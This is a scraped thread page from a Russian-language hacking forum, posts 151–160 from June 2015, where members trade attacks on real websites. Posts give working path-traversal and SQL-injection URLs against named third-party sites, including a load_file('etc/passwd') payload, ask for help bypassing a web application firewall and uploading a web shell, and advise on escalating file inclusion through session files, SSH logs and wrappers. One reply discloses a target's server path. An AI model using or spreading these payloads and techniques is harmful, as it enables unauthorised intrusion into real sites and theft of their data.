HOME FORUMS MEMBERS RECENT POSTS LOG IN  
× Авторизация
Имя пользователя:
Пароль:
Нет аккаунта? Регистрация
Баннер 1   Баннер 2
НОВЫЕ ТОРГОВАЯ НОВОСТИ ЧАТ
loading...
Скрыть
Вернуться   ANTICHAT > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #151  
Старый 04.06.2015, 11:06
faza02
Banned
Регистрация: 21.11.2007
Сообщений: 181
С нами: 9721141

Репутация: 1013
По умолчанию

Цитата:
Сообщение от huntercs16  

Код:
http://esn.po.opole.pl/index2.php?dir=photo&id=../../../../../../../../../../../../../../../../../../../../../../var/log/apache2/error_log/./././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././.&name=img_0160.jpg&site=photo_zoom
Вот тут реально нестандартный еррор лог. Что это?
это нестандартный еррор_лог. пробовали файлы сессии? лог ssh авторизации? сделать акк на сайте? найти ацес лог? есть ли возможность использовать врапперы? вообще в случае, когда на хосте крутится еще пара десятков сайтов стоит смотреть в их сторону

.SpoilerTarget" type="button">Spoiler: xek
 
Ответить с цитированием

  #152  
Старый 04.06.2015, 13:25
Br@!ns
Постоянный
Регистрация: 03.09.2010
Сообщений: 885
С нами: 8258006

Репутация: 25


По умолчанию

.SpoilerTarget" type="button">Spoiler
http://beadfxnew.dmt.net/classes/cl...1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17+--+

Помогите waf обойти
 
Ответить с цитированием

  #153  
Старый 04.06.2015, 21:19
Mister_Bert0ni
Участник форума
Регистрация: 10.05.2015
Сообщений: 142
С нами: 5795606

Репутация: 57
По умолчанию

Всем привет. Банальный вопрос:Если есть регистрация на сайте то значит сайт как то пишет регистрационные данные в базу.Но уязвимость sql в другом скрипте,например в index.php в параметре id.Так вот когда раскручиваешь скуль то оказывается что у current_user-а права только USAGE и подменить хэш админа он не может.Как так???? Получается что сайт записует данные от привелегирированого юзера??
 
Ответить с цитированием

  #154  
Старый 04.06.2015, 21:30
huntercs16
Участник форума
Регистрация: 07.10.2013
Сообщений: 140
С нами: 6630806

Репутация: 6
По умолчанию

Код:
http://filmfactor.pl/?st=-1+/*!uNIoN*/+%28/*!SelEcT*/+1,1,load_file('etc/passwd'),1,1,1,1,1,1,1+%29+--+;
Подскажите директорию в которой сайт лежит
 
Ответить с цитированием

  #155  
Старый 04.06.2015, 21:37
winstrool
Познающий
Регистрация: 06.03.2007
Сообщений: 59
С нами: 10095779

Репутация: 137
По умолчанию

Цитата:
Сообщение от huntercs16  

Код:
http://filmfactor.pl/?st=-1+/*!uNIoN*/+%28/*!SelEcT*/+1,1,load_file('etc/passwd'),1,1,1,1,1,1,1+%29+--+;
Подскажите директорию в которой сайт лежит
При вызове обычной sql ошибки, дается раскрытие путей:

Warning: mysql_fetch_array() expects parameter 1 to be resource, boolean given in /home/filmfactor/public_html/filmfactor/index.php on line 103
 
Ответить с цитированием

  #156  
Старый 05.06.2015, 15:54
Filipp
Участник форума
Регистрация: 10.05.2015
Сообщений: 251
С нами: 5795606

Репутация: 31
По умолчанию

Никто не подскажет, как можно залить шелл через самописный двигл, имеется спортанский набор: Загрузка файл JPG, PNG,GIF, и обычный HTML редактор. Пробовал пропихнуть шелл через картинку, ничего не получилось, картинка обрабатывается какой то php функцией, и не дает загружать любое другое расширение кроме выше описанных (Корректировка запроса не помогает, все равно срабатывает защита). Так же пробовал в гифку добовлять комментарий - результата 0. Так же в запросе я нашел местечко, куда сгружаются все заблокированные файлы, попробовал подставить, дало ошибку 403)) Так же заметил одну особенность, файлы загружается через SQL запрос. Может быть есть способы заливки шелла именно через HTML редактор, ведь туда что угодно впихнуть можно?
 
Ответить с цитированием

  #157  
Старый 05.06.2015, 18:05
Ravenous
Участник форума
Регистрация: 14.07.2012
Сообщений: 115
С нами: 7278806

Репутация: 26
По умолчанию

Ребя, нужен аналог плагина Live HTTP Headers, ибо он перестал работать ( на кнопку "Повтор" не регагирует). Нужно чтобы была возможноть POST переменные передавать строкой типа &a1=1&a2=2&a3=3, а не по отдельности забивать как в программе HttpReq например.
 
Ответить с цитированием

  #158  
Старый 05.06.2015, 18:55
Filipp
Участник форума
Регистрация: 10.05.2015
Сообщений: 251
С нами: 5795606

Репутация: 31
По умолчанию

Цитата:
Сообщение от Ravenous  

Ребя, нужен аналог плагина Live HTTP Headers, ибо он перестал работать ( на кнопку "Повтор" не регагирует). Нужно чтобы была возможноть POST переменные передавать строкой типа &a1=1&a2=2&a3=3, а не по отдельности забивать как в программе HttpReq например.
Burp Suite.
 
Ответить с цитированием

  #159  
Старый 05.06.2015, 19:22
winstrool
Познающий
Регистрация: 06.03.2007
Сообщений: 59
С нами: 10095779

Репутация: 137
По умолчанию

Цитата:
Сообщение от Ravenous  

Ребя, нужен аналог плагина Live HTTP Headers, ибо он перестал работать ( на кнопку "Повтор" не регагирует). Нужно чтобы была возможноть POST переменные передавать строкой типа &a1=1&a2=2&a3=3, а не по отдельности забивать как в программе HttpReq например.
HackBar
 
Ответить с цитированием

  #160  
Старый 05.06.2015, 20:45
Zen1T21
Участник форума
Регистрация: 13.01.2013
Сообщений: 157
С нами: 7015286

Репутация: 2
По умолчанию

Цитата:
Сообщение от Ravenous  

Ребя, нужен аналог плагина Live HTTP Headers, ибо он перестал работать ( на кнопку "Повтор" не регагирует). Нужно чтобы была возможноть POST переменные передавать строкой типа &a1=1&a2=2&a3=3, а не по отдельности забивать как в программе HttpReq например.
http://rghost.ru/8XjjrkDrr исправленный плагин

+

/threads/422049/
 
Ответить с цитированием
Ответ





Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT ™ © 2001- Antichat Kft.

×

Внести депозит

Введите сумму USDT:

Принимается только USDT TRC20. Fake/Flash USDT не засчитывается.

×

Вывести депозит

Сумма USDT:

Ваш USDT TRC20 кошелек:

Заявка будет отправлена администратору.